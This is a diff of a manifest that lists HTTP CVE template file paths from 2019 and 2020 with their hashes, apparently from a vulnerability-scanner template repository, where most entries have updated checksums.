+http/cves/2019/CVE-2019-9978.yaml:1b3a40b106ba8363cc772b8e6600a3b1f93c2e7b
+http/cves/2020/CVE-2020-0618.yaml:ab16071142d9ca737af7c0f06196c8f5d23310cf
+http/cves/2020/CVE-2020-10148.yaml:6f12eb56e9c6dd0f5451255df89e36fc17edba37
+http/cves/2020/CVE-2020-10199.yaml:61dd3065d7d3f820baa2254c1406c34690a55f24
+http/cves/2020/CVE-2020-10220.yaml:8f0f3d56baaf9e54a2c91cca0474f5b561d528f2
+http/cves/2020/CVE-2020-10546.yaml:c159673e49b9c1221cf799b52b3263cdef058158
+http/cves/2020/CVE-2020-10547.yaml:603c225287adb1da3843cbd1a2e4819eccde1189
+http/cves/2020/CVE-2020-10548.yaml:81cffe213c0f0d47008b9b907c495514da542561
+http/cves/2020/CVE-2020-10549.yaml:3adb8ca6b87069f220be0f420ba5076b00aa80d4
+http/cves/2020/CVE-2020-10770.yaml:2ed0fa9b93f146fd8a17e1ab66603af77d91a4c1
+http/cves/2020/CVE-2020-10973.yaml:f63ca99dee81e3692490fc90dc8c540f06aa6976
+http/cves/2020/CVE-2020-11034.yaml:e2711e66ad55d14f817469d3fc927747a33ec3eb
+http/cves/2020/CVE-2020-11110.yaml:b86a59791784d1c6b7a8084769edc13aa52bb518
+http/cves/2020/CVE-2020-11450.yaml:22ef589cb726f1f71f875fe50c6bb6027750b3d4
+http/cves/2020/CVE-2020-11455.yaml:ef9283c685e4caeee621f8234eb78441fa0a7d52
+http/cves/2020/CVE-2020-11529.yaml:b241a14306580e855ffdc3730c660e84e42805db
+http/cves/2020/CVE-2020-11530.yaml:6614a1ba3dee7088e7dfed2ee9c1c0e42d966670
+http/cves/2020/CVE-2020-11546.yaml:43425a5f189bc9b3a2cac0a321b3cd395c8c3d49
+http/cves/2020/CVE-2020-11547.yaml:91ecca576de5894d4c5ab88b7aaf9fb3669342fe
+http/cves/2020/CVE-2020-11710.yaml:991649dd773cb62ac05adb4a4e24642e7e4363ca
+http/cves/2020/CVE-2020-11738.yaml:8b0f4050ead619ec6d50fddbe0bfc322f740c5d7
+http/cves/2020/CVE-2020-11798.yaml:f0cb20450dfafacb511603506d5917697d7e350b
+http/cves/2020/CVE-2020-11853.yaml:6d65507e4af4649fdbfb32412e96d0ce8294fcf9
+http/cves/2020/CVE-2020-11854.yaml:2feb2a2b9e5e0cd6271af4d14939ccc4e00bd7c7
 http/cves/2020/CVE-2020-11930.yaml:f68dff2f9fdd2ebec293f190ef7ddc40cbf98c02
-http/cves/2020/CVE-2020-11978.yaml:02cf14432f7b875f1de9d76c68ef2533adf50b20
-http/cves/2020/CVE-2020-11991.yaml:1cc45da3f2b19c9bde3eb2eec376cacdfb129692
-http/cves/2020/CVE-2020-12054.yaml:6c6bb2f3a0b4ac96d8cb88590d9fdbcc5ae38200
-http/cves/2020/CVE-2020-12116.yaml:69352d01aff3b0efec0bcfa560f0170338242388
-http/cves/2020/CVE-2020-12127.yaml:28420bfbf19c7486c41814fc4d9258bc6fa477e9
+http/cves/2020/CVE-2020-11978.yaml:234371bf548d02d60c0e6da7a5410ca936667cea
+http/cves/2020/CVE-2020-11991.yaml:3acd8956501fab925590c70df0528cf3af159b16
+http/cves/2020/CVE-2020-12054.yaml:3cbf532358dd4ea81cacb3b54e596b2d049e65cd
+http/cves/2020/CVE-2020-12116.yaml:d6d2a0838739edcd1c461baf8e99842a8f9951d4
+http/cves/2020/CVE-2020-12127.yaml:2c32548ba60d92574187dd031cedc7e442df676f
 http/cves/2020/CVE-2020-12256.yaml:9aa59754115f53455a2ea55a6ce1f81026ef09d1
 http/cves/2020/CVE-2020-12259.yaml:b9f83a08e7332a8e03b7f9d165f000f04a9f73d1
-http/cves/2020/CVE-2020-12447.yaml:4411f93a0ce06bee4e663ff52e7936d3ece74042
-http/cves/2020/CVE-2020-12478.yaml:eb876a850eabdf934339b88dcdaeaced828e6b8d
-http/cves/2020/CVE-2020-12720.yaml:771b62ba68f7217b56de3f2d810b738722ee88eb
-http/cves/2020/CVE-2020-12800.yaml:97db9df7b2971940af370b52da6e791322fa0d10
-http/cves/2020/CVE-2020-13117.yaml:fa8410a97bcba9daf2af625d3a3b66fee191f68d
-http/cves/2020/CVE-2020-13121.yaml:9e66a7782905dc7e08d59a0f10df957b5757091b
-http/cves/2020/CVE-2020-13158.yaml:895d9e5fc585a5dc9d9e735c8013ce74e70c9e1e
-http/cves/2020/CVE-2020-13167.yaml:d28c6f035cf7ec5201cbc8d48a924fc1044b31a2
-http/cves/2020/CVE-2020-13258.yaml:0174bad567b13bc32d24741f49ac05ce0a12839e
-http/cves/2020/CVE-2020-13379.yaml:cd8739e9bb23a8f349e30fe228abbac45775e89b
-http/cves/2020/CVE-2020-13405.yaml:ff0bb75af400dd6f6fee9683c80cd6589e7bc2ed
-http/cves/2020/CVE-2020-13483.yaml:37f6bf6d70c70fffc937d10142cdbfd9733013ab
+http/cves/2020/CVE-2020-12447.yaml:356cbbbf90180f0ad552fe39d72681a4195e4be9
+http/cves/2020/CVE-2020-12478.yaml:723b2d2ad40f47c11529a95653807b28e329e6f2
+http/cves/2020/CVE-2020-12720.yaml:e216d90a79688b2ffb23b111b7849b198b06b9e7
+http/cves/2020/CVE-2020-12800.yaml:b1d8d42f3b913b10104a9869c70e9bfb811d664e
+http/cves/2020/CVE-2020-13117.yaml:0bd953806df66ce10a00b8705c016d16c662a141
+http/cves/2020/CVE-2020-13121.yaml:fe7412d720bfa87668fcc36a10ec76272dba4657
+http/cves/2020/CVE-2020-13158.yaml:8a4c9c2e053c61f11ef4d2069c4b51257f560574
+http/cves/2020/CVE-2020-13167.yaml:a231ff8eba911412a01984712f777b426fc0b98c
+http/cves/2020/CVE-2020-13258.yaml:5dc33bd6020a52314b5982b582cda89513ded110
+http/cves/2020/CVE-2020-13379.yaml:4b4e5245dd3e7a02b33ee241a7387462a8cce67a
+http/cves/2020/CVE-2020-13405.yaml:b78c59c019bbb82be849426d99300be040921036
+http/cves/2020/CVE-2020-13483.yaml:204827fc6e4a65f327670a4393dd550a9a57bad1
 http/cves/2020/CVE-2020-13638.yaml:dc38a545915ecf42c7365d3000d2d78e9aec4cc6
-http/cves/2020/CVE-2020-13700.yaml:2b5b07a791b612407ab6fcf4ec0190e0fdd09082
-http/cves/2020/CVE-2020-13820.yaml:5c724e994ee5c8c33feb0e6df996b02b53dcad0f
+http/cves/2020/CVE-2020-13700.yaml:5b771f47b89e398efd5b5f9dc61daae0f144ffff
+http/cves/2020/CVE-2020-13820.yaml:f448b4029e29a253b5ac39901726155d64d94194
 http/cves/2020/CVE-2020-13851.yaml:7ec7322b7ac1e0cd639067f983d3bb645ed9961a
-http/cves/2020/CVE-2020-13927.yaml:6ff1a0d89309b5044f8ebd0551c1047e92cc1e64
-http/cves/2020/CVE-2020-13937.yaml:b875cd45d4518039b99bc3c6a1afbfae3400b00d
-http/cves/2020/CVE-2020-13942.yaml:3421a7569c5ec03b68900ef3d82d63b61617a096
-http/cves/2020/CVE-2020-13945.yaml:ae0c48f8330388a2162ab630c353684fe6422d80
-http/cves/2020/CVE-2020-14092.yaml:845262b467e531c3f1d17b3a705c34b0e43704e0
-http/cves/2020/CVE-2020-14144.yaml:52d3cc980d80e8699a3057f2fa3ee1905dedab65
-http/cves/2020/CVE-2020-14179.yaml:ca79a6e84b700ea41fe92bdd4dc4cc00d540fee6
-http/cves/2020/CVE-2020-14181.yaml:2db1cbb15b653e00a6fb5612c9a33b940dc872c3
-http/cves/2020/CVE-2020-14408.yaml:d54e3fe8834db09140a362c118e2a885a949bca0
-http/cves/2020/CVE-2020-14413.yaml:4976f6ed1d81bba0ad03ed2a94fb7dae1e2f79fc
-http/cves/2020/CVE-2020-14750.yaml:9ae31c8d3b4dd62855d20cf4c9d00e6ac3e38781
-http/cves/2020/CVE-2020-14864.yaml:4ff776dfca3a30a8c60de0ea5b0187ebcb1d1b42
-http/cves/2020/CVE-2020-14882.yaml:d44e50fafd27273963f2a9730ce1616a71ae2224
-http/cves/2020/CVE-2020-14883.yaml:8f3a52e0489ab636c1f3d1f50f0daf00156e989e
-http/cves/2020/CVE-2020-15050.yaml:662b725d408c5b3a69c585a5695a84d330e94622
-http/cves/2020/CVE-2020-15129.yaml:fce4171cca203075e9576c3ae46fb9cbc450477b
-http/cves/2020/CVE-2020-15148.yaml:eb22c0b9ea8bdd2dbb483bcdd53a2eff3e5449f4
-http/cves/2020/CVE-2020-15227.yaml:b9ce345418b0dca04d388f508f7def5e73ecf1f4
-http/cves/2020/CVE-2020-15500.yaml:60102b16164933250bdcfcff795b9ab7d06eaf55
-http/cves/2020/CVE-2020-15505.yaml:041dd7300d66e99424e9ece37019ac1dccb26e37
-http/cves/2020/CVE-2020-15568.yaml:b6f21dba0fb3c278ebbab7f28ab460e50b24c85f
-http/cves/2020/CVE-2020-15867.yaml:0e5c63e6551ee690b23edd67acc81675c6195631
-http/cves/2020/CVE-2020-15895.yaml:eb78e80400a2e26d569fd4fbb16f48ea67002017
-http/cves/2020/CVE-2020-15920.yaml:18b2d3f7224f2ccfe4cc87f97eaa89342993bff6
-http/cves/2020/CVE-2020-16139.yaml:da295c84da0c8bf3d522f6e88bb1efa10279e6e2
+http/cves/2020/CVE-2020-13927.yaml:762e063bde67e464349432ffe3e30ca7823a2753
+http/cves/2020/CVE-2020-13937.yaml:6e37600c53bb9c7aaf1bad70036f60953bb36abe
+http/cves/2020/CVE-2020-13942.yaml:dee94c4d198365847995cb963d452aea43e63760
+http/cves/2020/CVE-2020-13945.yaml:98abfeb5077d8115a5df38c65849baaa43f8372d
+http/cves/2020/CVE-2020-14092.yaml:9b8478ed79a7f4f1b1b1034386d63260fd82f00a
+http/cves/2020/CVE-2020-14144.yaml:6ee754fb3709a24e64585db70695f6b5acf6c7f6
+http/cves/2020/CVE-2020-14179.yaml:82cd682b8bdf8317e0ce40132b53f52cb3c46c74
+http/cves/2020/CVE-2020-14181.yaml:6468538f7135bc9c389c99e6aa65a6bef138f165
+http/cves/2020/CVE-2020-14408.yaml:84b10bfe8b3bc111eb2d9e5a1e4dfb2c2485d55e
+http/cves/2020/CVE-2020-14413.yaml:92bbebe86c8d33ae2214c3321499ccd574261084
+http/cves/2020/CVE-2020-14750.yaml:0acadd031a313d1fe79ba28deb1939808ec9d110
+http/cves/2020/CVE-2020-14864.yaml:4285e842de0b494315fb7116649c1d93acde25bc
+http/cves/2020/CVE-2020-14882.yaml:1797495be1f1c341caa0b4df656fd8cc7e1375af
+http/cves/2020/CVE-2020-14883.yaml:b5aa869870a711ee5350896e698d2e041b89275c
+http/cves/2020/CVE-2020-15050.yaml:fbaedbc599fb6e48305c1a5af2f32e4c37e03ebc
+http/cves/2020/CVE-2020-15129.yaml:a0effe7b5900920bafa8d8cc5d677140da826226
+http/cves/2020/CVE-2020-15148.yaml:4645ef9e913056ec476a9aa96c6fb8b5af4b3dca
+http/cves/2020/CVE-2020-15227.yaml:ea0471623ed2c763514e041831ab558360cd9641
+http/cves/2020/CVE-2020-15500.yaml:050ba10ecfa32c5267812badd17e5e14369eddec
+http/cves/2020/CVE-2020-15505.yaml:c0790c24e1b111b1d47164dfe95040a43ec04fd3
+http/cves/2020/CVE-2020-15568.yaml:f2f73492067ae95761efb45ba9cb1c687f7bc83c
+http/cves/2020/CVE-2020-15867.yaml:129f15a4f19266446fe9fc95f3a977e9059c01fb
+http/cves/2020/CVE-2020-15895.yaml:466c4eed2b5caa1ab35eda70551d67866631f43b
+http/cves/2020/CVE-2020-15920.yaml:31fbc13d59d3f649040d4794931914edf9fe999b
+http/cves/2020/CVE-2020-16139.yaml:7780259f2c70a7c368c178755bc72490499e60e7
 http/cves/2020/CVE-2020-16846.yaml:f34d977fc9cddbe448f012b98a5c7850b4f32f43
-http/cves/2020/CVE-2020-16952.yaml:7a8f89b2e0c19da87180f3fcca21d42d2d3ab184
-http/cves/2020/CVE-2020-17362.yaml:33e6430e9aed9489667957408eabcf0cb295da81
-http/cves/2020/CVE-2020-17453.yaml:22f52adb292c08fecfefdfb918a8579fdc095e3d
-http/cves/2020/CVE-2020-17456.yaml:af9ebbbf37a98f7ccd67bd783a36bd2714f0e30c
-http/cves/2020/CVE-2020-17463.yaml:23f5eaf3b6c5da1d7f68d3dd1db85b9d19aadfaf
-http/cves/2020/CVE-2020-17496.yaml:264eea4540d7c257c4bd650ae8f71843a6d7fe3c
-http/cves/2020/CVE-2020-17505.yaml:ec1727fc80d20314a04c6292a6212d484bbb4f78
-http/cves/2020/CVE-2020-17506.yaml:f85006b1c0c035d31df148808e073c5a7d75cec1
-http/cves/2020/CVE-2020-17518.yaml:b3a779fe2f123fab4840057b3f6688a98c6d9fd5
+http/cves/2020/CVE-2020-16952.yaml:4a0ad0a51365fa6c815006f5bec8b5297de0c0e2
+http/cves/2020/CVE-2020-17362.yaml:97caf91b5c62e424536fabd32531830f3ff640d7
+http/cves/2020/CVE-2020-17453.yaml:a09273da97cb74c21c66c8bdc8f173bc3048477e
+http/cves/2020/CVE-2020-17456.yaml:4049d71e01bfce887310ac203e941f3bb276ee88
+http/cves/2020/CVE-2020-17463.yaml:eece4d2fd331fa5bb84915eec9c6c2878eb3acbf
+http/cves/2020/CVE-2020-17496.yaml:6d5cbfd64ca54cf5afbf96b32caffd7af6d6f2ed
+http/cves/2020/CVE-2020-17505.yaml:091c89dc08c32c1c88c7ba765fe0b87735b6821c
+http/cves/2020/CVE-2020-17506.yaml:e012d044343da330f1336fb322cdf25e52406d80
+http/cves/2020/CVE-2020-17518.yaml:911985a59b6c9ca6a7300b9dba999df2fdb124c5
 http/cves/2020/CVE-2020-17519.yaml:2ebfbf4f78345e311a70f117a9fafe60dc220c00
-http/cves/2020/CVE-2020-17526.yaml:0453b3e0e6e42eea6a79dd5127360c570ada4018
-http/cves/2020/CVE-2020-17530.yaml:d07e5408217dacd7069c894b7d0dacab2426d73b
-http/cves/2020/CVE-2020-18268.yaml:6c796a353782cdd08a134b5473726426e32537e6
-http/cves/2020/CVE-2020-19282.yaml:99ee8399988706113399e614f13f8cfebddadcca
-http/cves/2020/CVE-2020-19283.yaml:98e3417877fcf81fcfb155225e80f8c6399e28f2
-http/cves/2020/CVE-2020-19295.yaml:f4f16f98fe814c3790d9defbf42fb59098a4a55c
-http/cves/2020/CVE-2020-19360.yaml:7b776562afab637e2d472d35b648152d315a3365
-http/cves/2020/CVE-2020-1943.yaml:0e4c4d5394e5ebd4585d72c90a4d37f3f17840d5
-http/cves/2020/CVE-2020-19515.yaml:dd1ae6cf850daee91d8d2e9f368258426a7a7455
-http/cves/2020/CVE-2020-1956.yaml:a87ab51f0543e7b303daa8c6295a625309aa8f68
-http/cves/2020/CVE-2020-19625.yaml:04a0b3c4da9583ea1385bfe51fe9e10f9db9338e
-http/cves/2020/CVE-2020-20285.yaml:e1d38bc20cabc485ce358fed83bbbbea0e482083
-http/cves/2020/CVE-2020-20300.yaml:6cf4c135c390a22ae90cc4e34b4223e8f97eb066
-http/cves/2020/CVE-2020-2036.yaml:c5729f4dc4bce33d69ab342840a7e0b67d930695
-http/cves/2020/CVE-2020-2096.yaml:14e480ee9f1450f2249682883804e485e4bfb9ad
-http/cves/2020/CVE-2020-20982.yaml:97d349f3fb5d68b10a8d2ea843b27cb51c69d8fd
-http/cves/2020/CVE-2020-20988.yaml:536a5d1df07447811f3e12bc65823ed201ef443e
-http/cves/2020/CVE-2020-21012.yaml:a3e88f239bb6fe4c19abec01977309ecef10ed8e
-http/cves/2020/CVE-2020-2103.yaml:b6a2938ef70d2e60b88aea903eecc18a22a60ede
-http/cves/2020/CVE-2020-21224.yaml:68f8f49be82f0557a9dbf3b07d88f64731b6747c
-http/cves/2020/CVE-2020-2140.yaml:400b68d9e410eb6bea7e6e1b25dc1b5d9f8c72c0
-http/cves/2020/CVE-2020-22208.yaml:b29090a1cf69705e68ab54a4d98788af7f6e6920
-http/cves/2020/CVE-2020-22209.yaml:6bbbcc9d163f2cdd800c9e1db55e36dfd7efb99e
-http/cves/2020/CVE-2020-22210.yaml:7f497aee282f5839a28ee21d56f751bf067f5805
-http/cves/2020/CVE-2020-22211.yaml:eed51351cdec2255c289d50807304bfbdaa0dc55
-http/cves/2020/CVE-2020-22840.yaml:71fcc4dcfd51257df26627106017600946cbb016
-http/cves/2020/CVE-2020-23015.yaml:6abe44ade0a3f11873ef9b111dcbde7a0f1b83eb
-http/cves/2020/CVE-2020-23517.yaml:3b0f8fd699b878469fdbeae64e65904fc3348ed8
-http/cves/2020/CVE-2020-23575.yaml:11f212677176bde7df494cb85986e89b914e72d6
-http/cves/2020/CVE-2020-23697.yaml:2e9ada49a3fc581c08ccc7837395e484d45acf67
-http/cves/2020/CVE-2020-23972.yaml:1081698a2ab4d15af8b5ee8daa9b647b45314d84
-http/cves/2020/CVE-2020-24148.yaml:fa1f048d95f96c3198cc2703149783cf46aacc14
-http/cves/2020/CVE-2020-24186.yaml:485286e7ebe9387ef0abca3ea5f321d577ddc4e3
-http/cves/2020/CVE-2020-24223.yaml:0bb9eab7d47e2cc0827c73381808e288b88e86bb
-http/cves/2020/CVE-2020-24312.yaml:1e909265f5b2ebc26450f3be4d350ea6e1b6a547
-http/cves/2020/CVE-2020-24391.yaml:f0e1b69d2de55260e3f95e97ee1b65b98485f1a2
-http/cves/2020/CVE-2020-24550.yaml:1fb534503513d97a817bd1066692aaf164da02d3
-http/cves/2020/CVE-2020-24571.yaml:796220ff193fe86f1aa7bb1cb7eff1b90bf24440
-http/cves/2020/CVE-2020-24579.yaml:aa1533165403f7bda0929575fd30ad1154d6a7f8
-http/cves/2020/CVE-2020-24589.yaml:e0b6ca0421ef448495cd35d99c0910a37c78fdcb
+http/cves/2020/CVE-2020-17526.yaml:e2f001d06badce54f710b78bf78c68fa903bd8b4
+http/cves/2020/CVE-2020-17530.yaml:dbc6b7f0222cdcf72ff401825e36043f789f7a61
+http/cves/2020/CVE-2020-18268.yaml:78de778af7897708e3f43ee584df19e5492bf6c5
+http/cves/2020/CVE-2020-19282.yaml:f22df1974b4682a68ffeec6df03d1577cb068a37
+http/cves/2020/CVE-2020-19283.yaml:ed9624895f1f6dc952d53d879ba40effd4a7751b
+http/cves/2020/CVE-2020-19295.yaml:1c67b24a147bc78fc9b697ca9e870bf663d2cba6
+http/cves/2020/CVE-2020-19360.yaml:be34141c317be159d85c9765b20550badd289485
+http/cves/2020/CVE-2020-1943.yaml:20e1354acdfe3b6372611b711f32add2fbbcd4f9
+http/cves/2020/CVE-2020-19515.yaml:07cfc8b4a904e22810a110871daf767307240774
+http/cves/2020/CVE-2020-1956.yaml:e8a1101cbbe8ccca1dd602fdad4ea467ced06bce
+http/cves/2020/CVE-2020-19625.yaml:13b579cd8c04dc69456c2fcf73b6e732e0687353
+http/cves/2020/CVE-2020-20285.yaml:a5f328cb32163d0856ad4cb8c60a77dca8ee8208
+http/cves/2020/CVE-2020-20300.yaml:66d8b44e52fd414ab2277a70c309bbb10c1a510f
+http/cves/2020/CVE-2020-2036.yaml:f9d28c4106c2f329486d2200bd7673971fed39ca
+http/cves/2020/CVE-2020-2096.yaml:a545411a4f68a69a742e0454acb49626500b9191
+http/cves/2020/CVE-2020-20982.yaml:04856395f5308ad62fbebcf2e9b20b5abd5a0f0e
+http/cves/2020/CVE-2020-20988.yaml:96917b468467ab2b4a2feb6e0aa9b464a57b8637
+http/cves/2020/CVE-2020-21012.yaml:320a788aff7bd642f8a5cbcddc0c505bfad7103c
+http/cves/2020/CVE-2020-2103.yaml:82b763971f9935e2acb21023056f3ce6a9be9252
+http/cves/2020/CVE-2020-21224.yaml:682c0c2ebc86097705eb0b43a2f9f1e34dd91e10
+http/cves/2020/CVE-2020-2140.yaml:fd2219f7835bfc5436415cdc1fcccf66dc287e90
+http/cves/2020/CVE-2020-22208.yaml:3af9f94547a4d2bcf930e6498f45590e01642c03
+http/cves/2020/CVE-2020-22209.yaml:99d897370d390eb460f23eb5440ffd9f200de18c
+http/cves/2020/CVE-2020-22210.yaml:768347abab26b8fe25c9f1f667c3a2eb3555a4e8
+http/cves/2020/CVE-2020-22211.yaml:e9956dba2a7056b3617436aa5078dfc485a52547
+http/cves/2020/CVE-2020-22840.yaml:420622f1ca0aedde2e5bd07338c5b89e1ac93226
+http/cves/2020/CVE-2020-23015.yaml:6977650019929dcf6fc9ddb17fd8cb1af896e245
+http/cves/2020/CVE-2020-23517.yaml:ed5cbebedf829b3ed16a8192bfa40d2b112501bd
+http/cves/2020/CVE-2020-23575.yaml:f9911f08788bc1468b843707933df9a581d58818
+http/cves/2020/CVE-2020-23697.yaml:944df39f6f85438e05487c0c0c29c00ab217b37d
+http/cves/2020/CVE-2020-23972.yaml:0575d4d24e693ad88cdcdb6d15255cd4864662d0
+http/cves/2020/CVE-2020-24148.yaml:71d0d3d63bafafe5dc8e0ed3b66d5412668594c9
+http/cves/2020/CVE-2020-24186.yaml:8acbf1e7d3e7923234ae863e7db65271a1f3a561
+http/cves/2020/CVE-2020-24223.yaml:419c0e1507478ad04de551e90dc7b6233462ade3
+http/cves/2020/CVE-2020-24312.yaml:a6aa3513c932f2efb2dbdcca7de811945361d4d7
+http/cves/2020/CVE-2020-24391.yaml:19ae10db46dfe19b5c5d6386ebdaf4ea04ca7626
+http/cves/2020/CVE-2020-24550.yaml:065fd5d739562d63ee6e850d7e001c5cc45d0c80
+http/cves/2020/CVE-2020-24571.yaml:04b0a58bc94153c9b28510212d7fc8de92c945b2
+http/cves/2020/CVE-2020-24579.yaml:3888f0dcc3f95a644e263fab8044915c9f2fb852
+http/cves/2020/CVE-2020-24589.yaml:a2a8675cf04d65079295facbfedfdb11ac17c083
 http/cves/2020/CVE-2020-24701.yaml:90331891e5e1e2d4ea2b7e5e2aa65a26246a7193
-http/cves/2020/CVE-2020-24902.yaml:245b0c6573673411303db277abb6839acb7c43b3
-http/cves/2020/CVE-2020-24903.yaml:49197740fd79b756597dbf79a1c6673fb48c8eaf
-http/cves/2020/CVE-2020-24912.yaml:368cd72b85f8e2348bdc1594422c43dc3db26838
-http/cves/2020/CVE-2020-24949.yaml:e2ac29a8afaa353ed5c1ac42d1c759b82a85fa3a
-http/cves/2020/CVE-2020-25078.yaml:d340891691768a5f3d32c2cdebd362d5f5a6a29d
-http/cves/2020/CVE-2020-25213.yaml:f424fb42812e2869f26f7c182d87e56e3f99e2fe
-http/cves/2020/CVE-2020-25223.yaml:4ebae74858cd12517f80955cf1541a7e165dfc40
-http/cves/2020/CVE-2020-25495.yaml:4025eefcee2791c320862675da2817123c444171
-http/cves/2020/CVE-2020-25506.yaml:487faa7100c4b6f473939e6ebdf51df25791113c
-http/cves/2020/CVE-2020-2551.yaml:8809178f7dabdbc1c188fc91f73444f59b25bcc0
-http/cves/2020/CVE-2020-25540.yaml:4d1ef51ef597ea7a3c153384449a4694cfc9f316
-http/cves/2020/CVE-2020-25780.yaml:d05942833bb09a43ab204b9d6d14e22281fe10de
-http/cves/2020/CVE-2020-25864.yaml:b7324086ff63a23529cbc1f0833bac86f61153b6
-http/cves/2020/CVE-2020-26073.yaml:6d8acf815cbada49b3ca71ec4ac35c980a24db09
-http/cves/2020/CVE-2020-26153.yaml:07cb0c2270c5a6908459eeef8224d811a3a1c216
-http/cves/2020/CVE-2020-26214.yaml:2a909e9e13c370765ac73a84e9a13072193e1fec
-http/cves/2020/CVE-2020-26217.yaml:05a1ee701f617c842817e4383f45d1ac6ddc9c38
-http/cves/2020/CVE-2020-26248.yaml:a64e877eae7bb31ce69073a369ceea87dd4d24a2
-http/cves/2020/CVE-2020-26258.yaml:e57ecc5d1925150ae56daabb8c412fa96fae95c9
-http/cves/2020/CVE-2020-26413.yaml:5d2e9994038e3149e77e4a6ece6dab186be4440c
-http/cves/2020/CVE-2020-26876.yaml:4030d4a8d93c35a3c0c065a1572ba5672454a457
-http/cves/2020/CVE-2020-26919.yaml:80b246a44a8e6eb9c164b3af3e12fa4e37ea2126
-http/cves/2020/CVE-2020-26948.yaml:75cd78ebd4419d9059df732d368a00103403c8e3
-http/cves/2020/CVE-2020-27191.yaml:7b9a9e2268d9e7f269d243e98df9d48651602785
-http/cves/2020/CVE-2020-2733.yaml:c51898cb84b60a233ec9bdacbde7248ce6d58ecf
-http/cves/2020/CVE-2020-27361.yaml:28feeb777a3a8940261157d9c05c53489be7c086
-http/cves/2020/CVE-2020-27467.yaml:51c8f3459f6c19d736b3a3960a4c0a8d884806c2
-http/cves/2020/CVE-2020-27481.yaml:4387346b0271baaa0c4208422d41b33a40e6adbb
-http/cves/2020/CVE-2020-27735.yaml:d5755137d6b16d680f9199d588052960de2631e9
-http/cves/2020/CVE-2020-27866.yaml:51e8c3b96d3f354779aad081b3ca885c03a58d29
-http/cves/2020/CVE-2020-27982.yaml:c18a3a3d6c7876aa345c01a5408c14ab886d0ef0
-http/cves/2020/CVE-2020-27986.yaml:94e3545fe46e49c425a5336d2bab9f9f1e2e8b3a
-http/cves/2020/CVE-2020-28185.yaml:91dfb88b012b1e93b2876fa74808db30569a88e1
-http/cves/2020/CVE-2020-28188.yaml:3ef042266a526c18c9788b76d595bab0e62097e6
-http/cves/2020/CVE-2020-28208.yaml:c278a66f24f9e84d4d312f44bf3eb209ef0a6618
-http/cves/2020/CVE-2020-28351.yaml:8203adfc8ec8650b2d470da842f5a494f0123310
-http/cves/2020/CVE-2020-28871.yaml:ea1094d2f9fce044b6e3360dee16e6afe659c83e
-http/cves/2020/CVE-2020-28976.yaml:555528a2a06ce0215f786ce2f498d4131ad491f6
-http/cves/2020/CVE-2020-29164.yaml:140d84cfeb2ff27566bd6c2bd1eb848688ffba8e
-http/cves/2020/CVE-2020-29227.yaml:a01dba7f363b4e70ff47de53932c0524bc269c55
-http/cves/2020/CVE-2020-29284.yaml:a19422e1642caf6ef1b72ccc9484cca99a50d0d5
-http/cves/2020/CVE-2020-29395.yaml:a21b169d3efe6cb8a1a11116a92b50e255901247
-http/cves/2020/CVE-2020-29453.yaml:f08befd27bedb4c2372c899acc5cf95b01b0d207
-http/cves/2020/CVE-2020-29583.yaml:44bf046e2cfb2c82728ab65783d01bc283d34c7e
-http/cves/2020/CVE-2020-29597.yaml:1a3e9c887844635d57ab8b1650347542ed6a4059
-http/cves/2020/CVE-2020-3187.yaml:ef356b446a90fff2cdc5dfa4e701cf36e0c16172
-http/cves/2020/CVE-2020-3452.yaml:e7da6d994ec0878343a751e7518b7aa59e5b1538
-http/cves/2020/CVE-2020-35234.yaml:dfb80d226d39970ccc99a85ec4ed401cde9bbb00
-http/cves/2020/CVE-2020-35338.yaml:f8078c26e26d9be2578e3d5e65fedfa0164f62fa
-http/cves/2020/CVE-2020-35476.yaml:fab0fb591eb5b263c153917a22a70ddedc7fa3c3
-http/cves/2020/CVE-2020-35489.yaml:a5a7381a5b5b67b675a9de7c02b70eef9b20c117
-http/cves/2020/CVE-2020-35580.yaml:a8bbc07be094ea04b988243d87706fb0490620d0
-http/cves/2020/CVE-2020-35598.yaml:27f0fc205b149e88e83df394588aa64d53dae5a4
-http/cves/2020/CVE-2020-35713.yaml:01bd388c7d78d44e68d38a637c37446aa686f0f6
-http/cves/2020/CVE-2020-35729.yaml:e56470bf0de03632ab730dab7325e4ed67c3bc97
-http/cves/2020/CVE-2020-35736.yaml:f5a8b007b372ecb2cf5eb21200b1301b2d6b8608
-http/cves/2020/CVE-2020-35749.yaml:4d988f469b6c4857c67946dc7f0c238ba09372b1
-http/cves/2020/CVE-2020-35774.yaml:c918b053266fa0fb50bac963bcc2dfb65460d8f8
-http/cves/2020/CVE-2020-3580.yaml:93e5f796a87e3c85319827e69b635db5ff2c7768
-http/cves/2020/CVE-2020-35846.yaml:a5fdcfc7af43bfed7da5dad0d592f4feaddcc09f
-http/cves/2020/CVE-2020-35847.yaml:0faf0b735794e9eb186b31ca07de38b00b224e4f
-http/cves/2020/CVE-2020-35848.yaml:588cf7dd5ecaaacf42d9d139030284bc4ed568cb
-http/cves/2020/CVE-2020-35951.yaml:76f268f6d69e43ba5a8dc6d65b9fb6308a4b68ef
-http/cves/2020/CVE-2020-35984.yaml:1be326c82955762310b8c39f5a52578d685785de
-http/cves/2020/CVE-2020-35985.yaml:654e732ee3c2b706f94c957402a7fb51b77bd7f2
-http/cves/2020/CVE-2020-35986.yaml:6fbd30229b83f2f2da70de7a56108d1fa58e0985
-http/cves/2020/CVE-2020-35987.yaml:12bc84329b24d4de5233276ff08dac5a1df41eaa
+http/cves/2020/CVE-2020-24902.yaml:67ccd15828b2b24660eec8d34d96609216121e2e
+http/cves/2020/CVE-2020-24903.yaml:35c594f2ae420b5e62f6649710c8766a6df375b1
+http/cves/2020/CVE-2020-24912.yaml:5fb76e6d3926661a202f5c4e707af2104ec95923
+http/cves/2020/CVE-2020-24949.yaml:3dfbe46b4215db70fee640b32076c420e4d231cd
+http/cves/2020/CVE-2020-25078.yaml:db9584fa19f05f14c1b7b4ffaaa05d104d5a08e7
+http/cves/2020/CVE-2020-25213.yaml:12ab4d983b918bd404ab3cd5acea2afd533fe727
+http/cves/2020/CVE-2020-25223.yaml:77a319ebc05e63a5075f131fb0e49506a82227ae
+http/cves/2020/CVE-2020-25495.yaml:c6d6550b0f2c98aaec216223098e22ff410192ad
+http/cves/2020/CVE-2020-25506.yaml:86258b984cb1548454b262f8663fb5242ee7aa4f
+http/cves/2020/CVE-2020-2551.yaml:7ee0b41c327dd2ad6a3b43d800b40221daba4393
+http/cves/2020/CVE-2020-25540.yaml:7d44e71887d3633b6c348e8cb2dfb741c6de74bc
+http/cves/2020/CVE-2020-25780.yaml:ea63d27e36daa6ef6f8d1ea7bf111fc47a9f32c2
